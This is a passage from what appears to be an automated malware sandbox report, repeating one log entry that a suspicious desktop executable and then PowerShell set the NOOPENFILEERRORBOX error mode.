Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
